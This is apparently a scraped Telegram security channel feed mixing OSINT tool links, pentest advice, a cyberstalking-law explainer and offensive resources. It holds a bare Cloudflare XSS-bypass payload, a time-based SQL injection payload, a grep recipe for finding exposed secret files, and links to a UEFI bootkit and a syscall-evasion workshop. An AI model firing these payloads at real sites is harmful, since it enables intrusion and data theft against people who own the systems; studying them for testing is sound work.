Hackerinthehouse
1.95K subscribers
127 photos
6 videos
23 files
527 links
Learn about Cybersecurity!
Download Telegram
OSINTTracker

A simple and free online tool to visualize investigations and collect data about different entry points (domains, email addresses, crypto wallet numbers) using hundreds of different online services.

https://app.osintracker.com/
πŸ‘7❀‍πŸ”₯1
Active Directory Pentesting Mind Map:

The Active Directory Pentesting Mind Map is a powerful tool designed to assist in conducting penetration testing on Active Directory environments.

▫️The Active Directory Pentesting Mind Map assists security professionals and ethical hackers in performing comprehensive penetration testing on Active Directory infrastructures.

▫️It presents a user-friendly and visually intuitive mind map that covers various aspects of the penetration testing process.

Mindmaps:

V1 V2 Download
πŸ”₯2
All-in-one OSINT tool for analysing any website

Link: https://web-check.xyz/

https://web-check.xyz/about#api-documentation
πŸ”’ Cyberstalking: Understanding the Law and Protecting Yourself πŸ”’

🌐 In today's digital age, where connectivity is a part of our everyday lives, cyberstalking has become a prevalent concern. It's important to shed light on this issue and educate ourselves on the legal framework in place to combat cyberstalking in India.

🚫 What is Cyberstalking?
Cyberstalking refers to the persistent and unwanted harassment, intimidation, or stalking of individuals through electronic communication channels. It involves malicious actions such as sending threatening messages, spreading false information, sharing explicit content, or even impersonating someone online.

πŸ” The IPC Penal Code Approach in India πŸ”
In India, cyberstalking is a criminal offense and is covered under various sections of the Indian Penal Code (IPC).
Let's take a closer look at some key provisions:

1. Section 354D
2. Section 509
3. Section 499 & Section 500
4. Section 66E & Section 67

πŸ‘₯ Protecting Yourself and Seeking Legal Redress πŸ‘₯
➑️ Safeguard your privacy: Be cautious about the personal information you share online. Regularly review your privacy settings on social media platforms and limit access to your personal data.

➑️ Document evidence: If you become a victim of cyberstalking, save screenshots, emails, text messages, or any other evidence that can help establish the perpetrator's intent and actions.

➑️ Report to authorities: If you experience cyberstalking, report the incident to the nearest police station or cybercrime cell. They will guide you on filing an official complaint and provide necessary assistance.

➑️ Seek legal advice: Consult a lawyer who specializes in cybercrime and understands the nuances of the law. They can guide you through the legal process and help you seek appropriate legal remedies.

🀝 Together Against Cyberstalking 🀝
Cyberstalking is a serious offense that can have devastating effects on individuals and their mental well-being. By spreading awareness, understanding the law, and taking preventive measures, we can work towards creating a safer digital environment for everyone.
πŸ‘1
BugBounty's tip for today <3

always after running waybackruls, katana, etc...
try to find secret files by running:

grep "\.txt"
~ "\.log"
~ "\.cache"
~ "\.secret"
~ "\.db"
~ "\.backup"
~ "\.yml"
~ "\.json"
~ "\.gz"
~ "\.rar"
~ "\.zip"
~ "\.config"
πŸ‘8
When doing a penetration test make sure there is verbiage in the executive summary that states what the penetration test does not cover.

For example, a black/grey box penetration test does not account for attack vectors that come from

- Insider threats

- Access to source code by some other means

- Phishing

It covers threats that start from the outside with little to no knowledge of the scope beforehand. This is the most common threat type, but usually the threat type that will have the least impact.

Most executives that read the report will probably not understand this, which may give a false sense of security for breaches that start from another attack vector.

It also gives you an opportunity to upsell more projects that cover other areas of the customer infrastructure in the future.
Cloudflare XSS protection bypass :

"&gt;&lt;Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))&gt;
❀‍πŸ”₯7❀1
SQL injection payload :

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'
❀‍πŸ”₯6
Bria

AI image generator that allows you to download images in PSD(!) format so you can edit individual layers in Photopea, Gimp and other image editors.

https://labs.bria.ai/

(Only 5 pictures for free, but you only need email to create new account)
DEFCON-31-Syscalls-Workshop-main.zip
3.9 MB
Contains all the material from the DEF CON 31 workshop "(In)direct Syscalls: A Journey from High to Low"
https://github.com/VirtualAlllocEx/DEFCON-31-Syscalls-Workshop
Rusty Bootkit

Windows UEFI Bootkit in Rust (Codename: RedLotus)
A bootkit can run code before the operating system and potentially inject malicious code into the kernel or load a malicious kernel driver by infecting the boot process and taking over the system's firmware or bootloader, effectively disabling or bypassing security protections.


https://github.com/memN0ps/bootkit-rs